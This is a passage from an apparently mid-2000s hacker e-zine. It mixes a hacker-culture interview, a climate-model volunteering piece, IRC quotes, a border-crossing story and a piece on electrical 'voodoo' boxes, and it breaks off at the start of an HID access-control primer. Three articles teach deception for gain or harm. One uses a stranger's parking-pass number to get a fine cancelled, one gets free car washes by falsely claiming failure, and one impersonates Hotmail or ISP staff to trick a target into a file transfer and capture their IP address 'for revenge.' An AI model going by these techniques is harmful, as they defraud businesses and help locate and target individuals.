people, different people, more/less official interference/interest,
etc.?"
A perfect example of the "hacker scene" going mainstream would be
with the 1983 release of the cult hacker movie "Wargames" starring
Matthew Broderick. After kids (and some adults) learned of modems,
and wardialing, computer hacking, and phone phreaking, soon came a
whole generation of people wanting to BE the Wargames character
"David Lightman". After this movie was released, the media soon
picked up on hacking culture, doing what it does best; scaring the
public with tell tale stories of how "hackers" are stealing their
credit card numbers, personal information, etc.
As the BBS days fizzled away and the Internet became the new main-
stream, the "computer underground", or at least the perception of
it, has changed dramatically. You still have your hardcore groups
(Cult of the Dead Cow, Hack Canada, etc.), but you also have a LOT
more people on one giant computer network with a voice. With the
Internet hacker culture has grown from thousands of tiny Bulletin
Boards around the world, to millions of web sites around the world.
We now have mailing lists, chat rooms, free VOIP conferencing sys-
tems, interactive hacker / phreaker radio Shows, and much more!
"What do you see in the future of hacking? Ie. Less/more theft,
less/more interest in freedom of information/privacy acts, etc?"
More focus on privacy through encryption. With the advent of tech-
nologies like quantum computing, the systems encryption that we
all rely on for our privacy and protection will become obsolete.
Infact the encryption we know today is becoming slowly obsolete.
Quantum Entanglement is more than just a theory; it's now a real-
ity. Within the next 10 years, I imagine there will be a hardware
and software based Quantum Entanglement solution for every aspect
of our lives; from banking to web site security. In the future we
will probably have the same old problems; more theft, more script
kiddies doing Denial of Service Attacks, more government agencies
and movie/music trade groups trampling on our rights, and more
hackers standing up trying to stop all the bullshit from getting
worse.
In the future we're also going to see more hackers focused on the
privacy aspect of computers more than anything. After 9/11, the
United States Government and private business began large data
mining activities (*cough* GMAIL *cough*). According to a recent
General Accounting Office (GAO) report to the Subcommittee on
Financial Management, the Budget, and International Security,
Committee on Government Affairs, of the United States Senate, the
federal government has been using data mining techniques for many
purposes, from attempting to improve government services to trying
to detect terrorist patterns and (hackers) activities. No less
than 52 federal departments and agencies are using or are planning
to use data mining, 131 data mining efforts currently are operatio-
nal, and 68 such efforts are intended. A lot of hackers are scared
of this, very scared. Don't believe me? Go to www.freshmeat.net and
search "privacy". You will be surprised by the number of open source
software projects dedicated to it. For a Canadian feel, go to Hack-
Canada.com and read about how we are fighting privacy violations
(BarLink) in our own province! This isn't stuff that is happening
far away... it's happening in our backyards. It's happening right
now. It's up to hackers to stop it. Do you think Green Peace is
going to make a difference? Those idiots are now on the Government's
agenda. They are partisan hacks. Same with a lot of groups out there.
This is my call to hackers out there reading my interview: if you
see a violation of your rights, all you have to do is speak up to
make a difference. Start protesting that shit... start defending
your rights before the government takes them away permanently.
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
<tek> hi, my name is tek, and i'm hear to smash all hopes, dreams, aspiration,
and goals.
_oo##'9MMHb':'-,o_
.oH":HH$' ""' "' -\7*R&o_
.oHMMMHMH#9: "\bMMMMHo.
dMMMMMM*""'`' .oHM"H9MM?.
,MMMMMM' "HLbd<|?&H\
JMMH#H' Contributing |MMMMM#b>bHb
:MH ."\ to the Study `|MMMMMMMMMMMM&
.:M:d-"|:b.. of 9MMMMMMMMMMMMM+
: "*H| - Climate &MMMMMMMMMMMMMH:
. `LvdHH#d? Change `?MMMMMMMMMMMMMb
: iMMMMMMH#b `"*"'"#HMMMMMM
. . ,MMMMMMMMMMb\. {MMMMMH
- |MMMMMMMMMMMMMMHb, `MMMMM|
: |MMMMMMMMMMMMMMH' &MMMM,
- `#MMMMMMMMMMMM |MMMM6-
: `MMMMMMMMMM+ ]MMMT/
. `MMMMMMMP" HMM*`
- |MMMMMH' `Wizbone `05 ,M#'-
'. :MMMH| .-
. |MM -
` . `#?.. . ..'
-. _. .-
'-|.#qo__,,ob=~~-''
For many years now, a substantial portion of the scientific community has
acknowledged that the Earth's weather patterns have been changing. Many of
them can't agree on what exactly is happening, but the overall consensus is
that the global levels of carbon dioxide and other greenhouse gases are
increasing in our atmosphere at an alarming rate.
It is believed that this is a result of our abuse of fossil fuels. Despite
many lame attempts at controlling the release of these greenhouse gases by
the developed world - the most recent being the controversial Kyoto accord -
very little progress has been made. While the developed world has reduced the
number of particulate matter being released, most of the manufacturing that
was the worst contributor to this has simply been relocated to Asian third-
world nations, most of which have no environmental standards, or no means to
enforce them. This obviously solves little, as pollution doesn't recognize
borders.
Mainstream media is slowly beginning to address the issue, but for the time
being, still very little is known about the normal patterns and trends of our
planet, let alone the effects humans may be having on it.
Nonetheless, there will be a great deal of discussion about the recent
findings from a group of individuals running one of the largest climate models
yet, ClimatePrediction.net. Organized and managed primarily by the University
of Oxford, Rutherford Appleton Laboratory and The Open University, all based
in the UK, it is joint-sponsored by the Natural Environment Research Council,
and the UK e-Science Programme. The goal of the project is to "improve methods
to quantify uncertainties of climate projections and scenarios, including
long-term ensemble simulations using complex models".
For those of you who have never heard of this, here is CP.net's explanation of
what a climate model is:
"What is a climate model? Climate models are numerical representations of
various parts of the Earth's climate system. There are two ways of looking at
this. In some respects, scientists are trying to reduce the complex behaviour
of the climate down to a set of mathematical equations, in the hope that they
can then begin to understand the processes that are going on. This is true
especially of fairly simple models. In the case of state of the art General
Circulation Models (GCMs) such as the one used in the climateprediction.net
experiment, it is more a case of trying to represent everything, even if
things then get so complicated that we can't always understand what's going
on. The equations are tweaked, within reasonable boundaries, so that the model
does as well as possible at producing past and current climates (compared to
archived observations). It can then be used to try to predict what the climate
is going to do in the future.
GCMs try to simulate as much as possible about the climate system: the
incoming and outgoing radiation, the way the air moves, the way clouds form
and precipitation falls, the way the ice sheets grow or shrink, etc. They are
frequently (as in the model we use) coupled to a representation of the ocean.
They may take into account how the vegetation on the Earth's surface changes.
Critically, they try to calculate how all these different parts of the climate
system interact, and how the feedback processes work.
This is why the "best" estimates of future climate come from general
circulation models, rather than simplified models."
[taken from http://www.climateprediction.net/science/model-intro.php]
CP.net just published its first findings on the 27th of January of this in the
publication Nature (http://www.nature.om/nature). A copy of this paper can be
found at http://www.climateprediction.net/science/pubs/nature_first_results.pdf,
but the most startling finding is that these models have found a temperature
increase between 1.9 and 11.5 degrees Celsius over this century. According to
their paper, most models clustered around the 3.4 degree mark. This is still
within the general consensus of the scientific community on global temperature
increase. Typically scientists didn't believe the temperature would increase
more than 6 degrees, but according to the cp.net study, the temperature could
still reach 11.5 degrees above normal, which would be more than catastrophic.
The cp.net model conclusion has ruffled some feathers in the scientific
community, but in order for them to refine their study and actually publish
more specific conclusions on the effect we're having on our environment, they
need to continue building and studying models. Hopefully, as the results
become more sophisticated, the world will see what will happen if our current
disregard for the environment continues.
The best part about the Climate Prediction project is that YOU can help.
CP.net uses the BOINC, which is the Berkeley Open Infrastructure for Network
Computing. BOINC is a small application which allows projects such as
ClimatePredictor and SETI@home to take advantage of the immeasurable unused
CPU cycles available on personal computers all over the world. BOINC is free
to use, opensource, small, and supported by a variety of platforms. It can be
set up to stop using cpu cycles during user activity, so it will never
interfere with your personal computer experience.
I strongly encourage anyone reading this to take advantage of this opportunity
to contribute to discovering how we're messing with our climate. This is
everyone's planet, and for the sake of ourselves and future generations, we
need to try to protect it. CP.net will help us learn what steps we should take
to do this.
Follow this link to create a BOINC account:
http://climateapps2.oucs.ox.ac.uk/cpdnboinc/create_account_form.php
It's important you give a legitimate email account as you will be emailed your
unique BOINC Project ID.
Once you've recieved your confirmation email. Follow the instructions
contained within to activate your account.
Once you've done this, follow this link to download and install a client for
your operating system (Windows, Linux, Apple):
http://climateapps2.oucs.ox.ac.uk/cpdnboinc/download.php
Once the application is installed, it will prompt you for the project URL
(http://www.climateprediction.net) and your unique ID.
This is all you need to do. Depending on your preferences, it may start
computing immediately, or it will wait until your machine has no user
activity.
At this point, you may also choose to join a team. I've created a team called
"Last Place!"
(http://climateapps2.oucs.ox.ac.uk/cpdnboinc/team_display.php?teamid=1657)
But you may also want to create a team for you and your friends. Whichever you
choose, team or no team, you're still contributing to a good cause and should
give yourself a quick pat on the back.
End.
2005/01/30
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
<theclone> I want to be a psuedo intellectual who hangs out at starbucks
drinking $10 coffee's preaching about how my poetry is better than thous!!!!
*eye liner running down face*!!!! IM INTENSE!!!! *INTENSE HEAD VEIN SHOWING*
How I Pimped Impark With Simple Social Engineering.
Written By : H1D30U5
November 18 2004
First off, I'd like to say thanks to the helpful operator with
whom I dealt with today, she was not only helpful, but was
quite understanding also, and that's a virtue that many in her
profession unfortunately have not acquired.
Ya ever go downtown and have to park in that madness? Yeah, I
know you do. You go and get suckered for 5 bux a day to park
under that big "P"
You'll notice that 90% or more of Edmonton's parking is contr-
olled by a company called IMPARK. Now, while being a near
monopoly, there are other options... For example Expert Parking,
or some of those 8 storey monstrosities.
But, Wouldn't it be nice to get a break from the parking monster?
Like for instance, when your parking ticket expires at 12:00 and
you've arrived back at your car at 12:06 and found a ticket on
the dash? (I swear, the bastards must stand there and wait for
your ticket to expire...)
Today, I arrived at work, opened my change compartment, and to my
dismay, found only $2...That's good for an hour's parking in the
lot that I park in... As the other lot is a full block and a half
away, and me being a lazy bastard, I had an idea that I wished to
test. So I paid for my parking, and it clearly stated on my
ticket that it expired at 7:02AM...that's not going to get me far
but since I was outta cash, and 2 minutes late for work, I said
fuck it.
9 hours later...
I arrived back at my car, gingerly pulled the ticket out from under
my windshield, screamed NOOOOOO, and then hopped into my car to
examine this most foreign object. I looked at the ticket, and saw
the time I was ticketed, A control number, a lot number and some
garbage stating "Receipt expired 7:02AM Test receipt 1111111" And
a 35 dollar price tag, if paid within the first week, but since I
don't have a credit card with which to pay online, it'll be 65 bux
by the time my letter arrives at their head office in Vancouver...
I saw the phone number on the back that you can call if you have a
dispute... And trust me, at 5 bux a day, I had a dispute alright.
I called the number and decided to turn on the SE skills to see
what I could pull off.
10 minutes later, the operator picks up, and I said "hello, how
are you" she quickly replied "fine thanks, what is the nature of
your call?" "Yeah...I bought an all day pass today, and I still
got a ticket, is there something we can do about that?"
She quickly replied "Mmmmkay, I'm going to need some information
from you..."
And she asked me for the ticket's lot number, the time it was
issued, the control number etc. which I gladly gave to her, and
she then asked "You said you had a pass? mmmkay, what time did
you purchase the pass?" "This morning." I replied, and then she
asked me for the purchase time that was printed on my pass...
*here's the good part*
I looked over at the car next to me, saw that he had a valid all-
day pass for this lot, and replied "5:55AM" "Mmmmkay, I'm gonna
need the parking pass' control number" "020638" I promptly replied,
she then said "mmmkay, I'll just run this through the computer...
Oh, I'm terribly sorry, I'll give you a cancellation number right
away. She then blurted out a 6 digit number to which I paid absol-
utely no attention. "Yeah, that happens more often than you'd
believe" she told me.
So I said no problem, then began asking her questions, and I gle-
aned this info.
In the Edmonton office, there are 8 operators at a time, they
work 4 hour shifts, receive no benefits, and Gary the boss is
an asshole.
So I figured if there's 8 operators, you could theoretically do
this 8 times a day... that's a lotta free parking.
There we go, a 'sploit that anyone can relate to, and perform
without much trouble at all. You saw it first on Nettwerked.net.
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
<MadCatX> heh 90s grunge, if you didn't take your own life, you weren't really
there
---------------------------------
Free Carwashes for Fun and Profit
by an Anonymous Social Engineer
Feb 15 2005
---------------------------------
[ search for <HockeyHockey> to skip the story ]
Let's face it. Car washes are expensive. So is gas. To get a
carwash at a less disgusting price from most gas stations you
need to get a fill up. Just yesterday, gas hit an all time high
of almost 80 cents/L. That's highway robbery. And the poor ain't
doin' the robbin this time. I say take from the rich and give it
to yourselves! Aye!
To top it all off, if you drive a hybrid or fuel economy car,
governments stand to loose tax money they use to "build stuff".
(cf. 1) Like the next big unjust war for more oil. Now, we don't
want to get caught and end up next to Bruno the Axe murderer in
the clinker, so we've got to find a sneaky and legal way to rip
these big companies off. I found out how to help do this quite
by accident.
A week ago, my car was looking like shit. Naturally, Canadian
roads will rip a car apart in only a couple years if you don't
wash 'em eh? Salt and grime is all consuming just like big corp-
orations. Conspiracy theorists may posit that this is done by
municipalities simply to appease the corporate gods and cost you,
the taxpayer, more carwashes. So I pulled up to this PETRO-sCANm
around the corner and bought a fill-up and a wash. The deluxe,
"I'll charge you $13 dollars" wash. I figured that it was stupidly
expensive but like most other people I'd just not get another
until summer, and that washing my car now would prevent me from
buying another car in a week. So I waited in line for an hour and
20 minutes. I was bored outta my tree; I swear they do this so you
buy their crap food as supper. I bought $5 in hacker snax from
their "On The Run" store. It dissapeared in seconds. Their whole
evil operation is setup to really fork you over. Or your cash.
One both! I even had time to calculate almost exactly that for
every car in line I'd be waiting an extra 5 minutes and 15 seconds
to get through. Anyway, let's cut this whale of a tale down. (Just
kidding, Greenpeace!)
----
<HockeyHockey> Jaberwocky! NHL is dead???
Now you've skipped my story, I hope you smash yer 'ed.
(Easy Clone, I didn't mean you! ;-)
----
After I came out of the car wash, I noticed the wash blew. In retro-
spect, I'm pretty sure they ran out of foam soap. So I drove around
and walked into the till and kindly asked the grease monkey behind
the counter what his policy was if my car was still dirty. He said,
"this is my policy" and handed me a new wash ticket.
--------------------------------------------------------------------
Now a couple points:
You need to turn in your old receipt, and claim it didn't work (AFAIK).
Heck, turn it in the next day if you feel like it but I think it's
more usefull to turn it in the same day. They are dated, but you can
claim that you didn't use it until today. Experiment. The great thing
is is that each ticket is good for *90 days* from the day of purchase.
So I had 90 days to use the first one and claim 'it didn't work' And
I'm sure you can always find at least one brown spot that didn't get
clean! The amazing thing is the new tickets are good for 90 days too!
So go ahead, sell it. Pawn it. Keep it. Don't use it for four weeks.
Loopholes abound! Just make sure you use it and don't abuse it. Give
them to friends! Set up commie ticket-washing swap-communes! Damn, I
can't believe the potential.
So, the moral of this story is:
* Be polite and ask nicely, even to people that do you injustice.
Turn the other cheek man! Jesus was damn smart, and was God.
Beauty, eh?
* Then turn around and use the system to your advantage. After all,
the system was created by humans. They're not perfect, so why should
you be? Sin makes the world go round.
* Keep your social engineering antennas out for other good tricks,
and share them with your friends. Don't forget your Beaver motto
kids: Sharing, sharing, sharing!
Now to counter those that may say this trick is 'obvious' or 'lame':
No it's not! It's a two-fer! Think about it: without a coupon you
continually have an extra wash whenever you want it! And if you pay
cash, there's no way they can track you! Better yet, the only thing
they can do to stop it is to say "no more carwashes for YOU" or try
some similar fasc
hist argument. They gave it to you, and i'm sure
you can find some reason to say your car is dirty to back it up.
"It's not fraud, Mr. Mountie. Wanna free wash?"
Cheers, and keep your stick on the Ice!
-
\\\ Die Corporate Mofos Die!
\\ NHL Is Dead! Long Live Hockey!
\\ 1917-2004
\\
\--\--//--
\--||-|-/
Shouts to the whole Nettwerked Crew.
References:
1) "California Wants GPS Tracking Device in Every Car": Slashdot.org:
http://yro.slashdot.org/article.pl?sid=05/02/15/201217&tid=158&tid=219
------ 8< ------------ 8< ------------ 8< ------------ 8< ------------
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
<Cygnus> whats a god movie to get?
<Cygnus> good*
<MadCatX> jesus of nazareth
<MadCatX> oh
Back in the USSCanada:
Ok, this story needs to be told.
I have created a new example of Shrodinger's dilemma.
Axiom the first: I have been to Canada.
Axiom the second: I have not been to Canada.
These statements seem to negate each other, but at the same time,
both prove true. Shoving aside Godel into the mathematicians-
discard pile, we have a bizarre story to tell.
It all started when my friend Nytemare decided I needed to go with
her to Toronto. "The party scene up there is awesome! It's such a
breath of fresh air!" she paraded.... my friend Slashgirl had been
keeping up with the Toronto scene somewhat on message boards, and
it was general concurrence that Toronto has the best party scene
in North America. So it was decided.
Nytemare searched around for a few months looking for parties, and
sent me links to two really impressive looking raves that were
happening on Valentines day weekend. The one we ultimately decided
on, called Together As One, touted Aphrodite as headliner.... looked
damn good. So once I got my check from work, I slapped down $90 CDN
($64 USD) for two presales, and we were set.
Fast forward to the night we leave. As always, a bunch of crap happ-
ened that delayed us for three hours, but through persistence and a
little bit of luck, we eventually found ourselves northbound on i-55
headed to Toronto. Now let's set back and examine the car: Slashgirl's
car is technically illegal due to a muffler problem (the tailpipe
busted off when I did a u-turn on the sidewalk last time we were in
Chicago) and it's all rusty East St. Louis style. The gaping hole of
wires where the stereo used to be makes a decent trash can, and if you
jiggle the exposed metal in the right way you can get the cigarette
charger working. Of course, I was forgetful and left power inverter
somewhere (AWOL at the moment), as well as our main source of music,
Slashgirl's PDA, both of which are still missing. The rest of the car
contains an homage to scientists and pack-rats through the centuries
in the form of a heterogenious mixture of garbage and technical manuals.
In other words, a geek car.
Somehow this clunky vehicle manages to get insanely good gas mileage,
and transported the three of us on our way. I drove for the first 6/7
hours, which was fairly uneventful until at some point in the middle
of bumfuck IL when I realized we were out of gas.... and had a random
podunk town with a gas station not realized within a five minute
period, we'd still be out there collecting birdseed from passerbys.
We hit the Chicago area, made a turn onto some road, and I pulled over
and made Slashgirl drive so I could sleep.
When I woke up, we were on the lower end of Michigan, and I reassumed
driving. There's an area where the highway splits, one way goes to
Lansing, the other goes to Grand Rapids. We thought we took the right
way, until I realized after about 70 miles that the next road wasn't
coming up. We pulled into a gas station on the outskirts of Grand
Rapids, and the lady showed us a map that said we'd gone 50 miles
out of the way. Fuckity fuck fuck fuck. I got back into the car and
started driving, all the way back to that road split, and finally on
the right track.
At this point the sun was coming up, so I switched driving spots with
Slashgirl again. From the signs we could tell we were getting closer
to Port Huron, the border city to Canada, and we started getting really
excited. Nytemare started rambling about how awesome Toronto is going
to be, she's going to get to hug her favourite buildings, etc. We rolled
through Port Huron, paid the bridge fee, and crossed the river into
Canada. The view from the bridge was utterly spectacular, one side
extremely industrious, the other side almost a prarieland of water and
ice. Maybe it was the sun coming up, maybe the Canadian vibe, but there
was something that made this land feel special.
We arrived in Canada, completely exhausted but highly anticipating
Toronto. We pulled into the toll window, presented our IDs, and moved
the car to the customs arena. Several customs officers came out, asked
us to step out of the car so they could search it. On hindsight, I feel
kind of bad, because the car was an utter mess; I'd forgotten that
international boundaries tend to be more intrusive, which meant that a
half-dozen officers pored through the entire contents of the car. We
stood at the front of the car watching the search for about 45 minutes,
at which point an officer came to us and asked if we'd follow him inside.
We cast nervous glances at each other, not sure what was going on....
but complied peacefully.
Once inside, we were led to a room in the back with some chairs where an
officer sat with us and politely told us they had checked all our IDs for
residue-- and all of them came up positive for either ecstasy or cocaine,
which provided probable cause for a routine search. Slashgirl was taken
into another room, and Nytemare and me emptied our pockets for inspection.
At this point we overheard something about "ecstacy" from the other room,
glanced at each other, realizing Slashgirl had brought a pill in with her.
The officer found nothing on either of us, so we went back into the main
room to wait for Slashgirl. Another 20 minutes or so passed, and they
asked us to return to the room. The officer sat us down and told us that
they had found ecstacy on Slashgirl, and she had been arrested.
Let's enter the mindset here: this could have serious implications. In
the US, this means probably means either a hefty fine (several thousand
dollars) or jail time. Nytemare and I discussed a bit, going over possi-
bilities... where could we get a lawyer, how could we raise money....
we both had connections we could hit up, but there was another issue.
If they took Slashgirl into custody, that meant they'd also take her
car, which meant we'd have no way of returning home. Maybe we could
raise money at the party, assuming we got through immigrations. Either
way, we wouldn't get home in time for work on monday, which meant we'd
both probably be fired ("sorry boss, I was absent because I got arrested
in Canada...").
After explaining the laws and policies very clearly, Slashgirl joined us
again, and we were told we would be subject to further search. Now they
led Nytemare and me out into the hallway, stripped our pockets and shoes,
and asked us to assume frisk position as they checked for drugs and
weapons. Then a lady who'd interrogated me rather harshly before led a
trained dog through our belongings. At the end, we both apparently reeked
heavily of something, so they looked intensively through my stuff for coke
folds and whatever else, and in the end I was strip-searched.
When they'd concluded there was nothing else on us, they sat us down and
presented us with the penalty for importing ecstasy and the price Slash-
girl freedom: no jail time, just a $220 Canadian dollar tariff. If you
can imagine having an anvil lifted off your chest, you'll begin to
appreciate how incredible this feeling was. I think our eyes all lit up
in synchronicity, energetic joy as we realized we'd be leaving customs
today after all! I -might- have enough money on my card, and if not we
can pool together what we have and be gone.
Before we continue to immigrations, I want to comment on how the Canadians
treated us. "Nice" isn't a proper word to describe it... they treated us
like fellow human beings. Not only did they constantly make sure we were
comfortable, offering us water, juice, the washroom, and whatever else we
needed, but they expressed genuine concern and interest in helping us get
the best possible outcome of our dilemma. We had conversations with the
guards, chatted about silly things, formed simple relationships that
showed they cared! It was like talking with random people at a good party,
except that they were uniformed guards from another country detaining us.
I'll conclude my praise of their citizenry momentarily.
Now just because we'd gotten out of customs didn't mean we'd gotten thro-
ugh immigrations. We walked into the immigrations office, presented our
IDs, and Slashgirl and me were told to wait outside. I watched through a
window as Nytemare argued with the man and looked upset, and grimaced in
despair when she came out and announced "We're going to Chicago." My
feelings were a wicked mixture of relief and happiness and frustration
about driving 14 hours only to be denied access to Toronto. But there was
nothing we could do, so we got in our car and drove back to the US.
Because we'd technically left the US, we had to go through customs -again-,
this time for the country we were from. Normally US citizens coming into
US customs don't have much of a hassle, but we saw a stark difference here.
The office was set up in the same way, the same departments, the same
worker positions. And yet we were in a new world. All the people looked
tired, upset, none of them looked like they wanted to be there. The place
was dirty and felt greasy. The officers working the desk were extremely
inefficient, made friendly but stupid jokes with the people coming in, and
nobody was smiling. Slashgirl summed it up this way: the Canadians are
ambassadors to their country, while the Americans are working a job. The
juxta-position between these two environments really isn't possible to
describe... it's like a virgin thinking about sex. What a magical river
it must be to separate two worlds so opposite in nature.... almost like
the English Channel.
This was supposed to be an in/out operation. Nytemare presented her reject-
ion slip, and an officer took her into the back for questioning. About 20
minutes later she returned, upset but readmitted into the US. In the car
driving towards Detroit, she told us how they'd accused her of being in a
drug bust in Detroit (she'd never been to Detroit), and accused her of
having problems with the US government. In fact, they'd almost not let her
back into the country! Nytemare is a sweet girl and one of my longest
friends.... to see her treated like that was damning.
But we were free. To Chicago we drove.
We spent the next day or two chilling with Pudicus and Slayer. Met some
other kids, had a good time and lots of good conversation, and managed to
make it back in time for work on Monday. But I'll never be the same. What
I saw in Canada, for the brief glimpse of time we were there, was almost
a throwback to my days in Holland. Perhaps "vibe" is insufficient to
display the magnitude of true humanity we saw, and perhaps our experience
is so limited it can be discounted. But it does provide me with a driving
force, both to travel back up to Canada, admitted this time, as well as to
continue pursuing my aspirative travels around the globe. As incredible as
the six foreign countries I've happened have been (Bahamas, France, Monaco,
England, Holland, and now Canada), there are over 200 established Nation-
states in the world, and many more undeveloped worlds. If these few cult-
ures affect me so much, then I need to see what else the world has to
offer. I think this is what well-travelled explorers refer to as "finding
God".
- aestetix
(02/18/05)
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
<Kirk> the one thing i don't get about star trek is they seem to use time
travel like we would a plane
<wizbone> when did they fly time travel into the world trade center?
###############################################################################
## ##
## Obtaining IP Addresses Using MSN Messenger ##
## ##
###############################################################################
h4v3n
Feb 2, 2005
www.nettwerked.net
Disclaimer
----------
If you are going to be a stupid fuck and actually use this information for
attempting criminal activities you'll probably get caught. I am releasing
information that I have found, how you use it is your choice, and I am not
responsible for your actions.
Foreword
--------
As anyone knows, before you try to attack a system you first must know how to
connect to the system. You either need a phone number to the system or a
public IP address. When a system does not have a static IP address it is very
hard to find it on the internet. This is where our good friends at Microsoft
comes in to provide IP addresses of MSN users.
We all know that IRC will provide you with an IP address of a user through DNS.
That is one of many reasons why many people who don't know what the hell they
are doing don't use IRC anymore. Instead they are now using an instant
messaging service like Yahoo or MSN. So what does this all mean? Easy, you
want to get access to a system that doesn't have a static IP address and MSN
messaging makes the discovery of the IP address relatively simple.
Details
-------
Let's say you have the problem that every little bitch out there wants
"hackers" to solve for them. You know a person on MSN or hotmail that you want
to get even with. Simple enough right? Well even though this is a very common
question this phile will only give you the IP address of a system.
OK so you 'know' this person, they pissed you off, and you have a hotmail email
address. Great that's enough to get started on your revenge. This will only
work if the target system, and you are using MSN messenger. This will not work
with msn web messenger. You can tell if a person is using the web messenger by
looking at the icon in the contacts list. If the icon has a small world on the
bottom left of the icon then they are using the web messenger and this will not
work. Add the person to your contacts list and hopefully you havent been a
complete ass already and the person has blocked you. You don't have to use
your account. In fact it's best you create a hotmail account just for this
reason. This way the person will have no idea who you are which will work in
your favor later.
When you are chatting with someone using msn messenger you never connect
directly to the other system. All messages are sent through *.msgr.hotmail.com
Great so you know what the messenger server is wow that doesn't help a bit.
This is where you need to be creative. If you start an application such as a
game or a file transfer you will connect directly to the person's system.
So when you set up your hotmail account for this purpose make sure you can try
to pass it off as hotmail staff or an ISP help desk or something along those
lines. If the person is stupid enough, this will work and they will accept a
file from you. If they are smarter than the average bear then you will have to
use another technique, use your imagination.
Once you get the person to accept a file or play a game then switch to a prompt
and use netstat <enter> and you will have a list of connections. Go through
the list and find your target. File transfers work by sending the data on a
high random port, so look for connections that are above 1023. Now you have
a DNS entry change it into an IP using a ping.
Now most of the time you will not be going after someone that will be as stupid
as to think that their ISP will send them a file through msn so try different
things, like try to gain their trust with some bull shit story or say you are a
distant relative researching your family tree and the user is your fifth cousin
removed or some crap.
So now you have the guy/girl's IP address what you do with it is your choice.
Conclusion
----------
There are so many ways to gain IP addresses and this is just another one. This
isn't anything amazing or ground breaking but like I said it's just another way
to get an IP address. This works every time you can establish a connection
through a file transfer using MSN. So now you have to think this person may be
behind a firewall that may block file transfers, now this will not work. There
are also factors like perimeter routers that will give you their gateway and
not necessarily their public IP. The information that you receive from this
simple connection is not necessarily the client's IP address so if you are
going to attack this address be prepared for anything.
###############################################################################
###############################################################################
## ##
## hh 44 44 vv vv 333333 nnnnn ##
## hh 44 44 vv vv 33 nnnnnn ##
## hhhh 444444 vv vv 333333 nn nn ##
## hhhhh 44 vv vv 333333 nn nn ##
## hh hh 44 vvvv 33 nn nn ##
## hh hh 44 vv 333333 nn nn ##
## ##
###############################################################################
###############################################################################
## ##
## 111 99999 888 44 44 ##
## 1111 99 99 88 88 44 44 ##
## 11 99999 888 444444 ##
## 11 99 888 888 44 ##
## 11 99 88 88 44 ##
## 1111 99 888 44 ##
## ##
## is here ... ignorance is no excuse ##
## ##
###############################################################################
###############################################################################
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
<theclone> Jesus was a fat brown man with an ego
<tek> theclone: Jesus is TRON ?
A Little Insight Into the Voodoo Magick Boxes (voodoo machines)
Cybur Netiks (cybur_netiks@Phreaker.net)
-www.hackdaplanet.150m.com-
Disclaimer: I'm not responsible for any damage you do by the use/misuse
of this information. Informational purposes only.
I recently bought a Voodoo Machine from The Clone during the Nettwerked
liquidation of the voodoo machines (and by the way, I'm a satisfied
customer). After first using it, Immediately I thought "how does this
thing work?" I mean, I've read the articles about neural stimulation,
but I wanted to know how the machine itself worked, not just the concepts
behind it.
So what did I do? I opened it up. and I was somewhat shocked to see how
incredibly simple the circuitry was, in fact, I'll bet it could be slimmed
down even more to basically just a pulse chip, a couple resistors, and a
battery (but it also could be as simple as possible already, I don't know)
the theory being, that the voltage is irrelevant, just the frequency that
is produced (the voltage is not entirely irrelevant, it must be high enough
to run the device and at the same time not fry you like an egg).
I did a little investigating, and I found that results similar to those
that the voodoo produce could be very easily reproduced, in fact, at only
1Hz, I was able to recreate the same effects as the voodoo machine! Now I
have heard people say that the voodoo is nothing more than a battery and
clips that were fancied up by blinking lights, but this is not possible,
as the effects were not triggered by the application of voltage, (if this
were the case, you would be high every time you were charged with static
electricity) the effects are actually brought on by the frequency created
by the voodoo. The body cannot adapt because the current keeps changing
(well, notreally, It's just blinking on and off) so your body releases
endorphins (see, that's the misconception, people are skeptical about if
it could really have any effect, when in reality, it is your own body that
makes you 'high', the voodoo just coaxes your body into this state) in
reality, what makes the voodoo so amazing is its effectiveness, ease of
use, and simplicity.
Anyone can cause endorphin release by experiencing intense pain, or even
just eating spicy food. But the voodoo brings on the effects much faster
and stronger than either of those (and I doubt anyone would want to break
their leg to induce endorphin release) The voodoo machine is more like an
amazingly simple yet functional invention rather than the miracle box
everyone dreams it to be, in fact, I'm surprised that it wasn't created
sooner! If you get the chance, pick up one of these sweet little devices
and try it for yourself. (at the time of writing, voodoo machines are
(were) on sale at www.nettwerked.net/voodoo.html).
-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O
<wizbone> remember that guy that always pissed on the slide?
<MadCat> yea
<theclone> that was you
<wizbone> people hated me
HID Access Control: Controlled.
A glance into the technology designed to keep you out!
Table of Contents:
:. Introduction & Warnings about AC tampering
:. HID EntryProx AC (Access Control) system overview
:. The Wiegand Protocol/Effect - A dirty primer
:. Programming AC Keypad units and encoding proximity cards
:. Conclusion
.:::::::::::::::::.
.: Introduction & Warnings about AC tampering :.
Access Control measures are employed by many private and government organ-
izations, big businesses and industrial facilities to identify and grant
access to anyone who belongs within the area they attempt to access. These
systems come in a wide array of shapes and sizes and since just about all
HID systems look unique they can be identified by their physical design
alone. This will give pertinent information about the security policies in
place and the limitations and features of the unit in question.
These HID systems are not only used to lock and unlock doors. They can be
used to store personal information, charge personal accounts for things
like lunch in a college cafeteria, turn on or off office lighting, grant
access to computer networks via a reader built into a keyboard and allow
the use of office equipment like copiers and fax machines and a lot more.
These systems may use a contact card in which the card must be slid into
or through the unit so it may read a small chip built into the card. They
can also combine biometrics and card authentication by requiring a finger
print and card to be presented for access.
The leading company developing todays Access Control technology is the
Hughes Identification Devices company called HID (referred to as H.I.D.).
HID was formed in 1991 as a subsidiary of Hughes Aircraft and was acquired
by ASSA ABLOY in 2000. The ASSA ABLOY Group claims to be the "world's
leading manufacturer and supplier of locking solutions dedicated to satis-
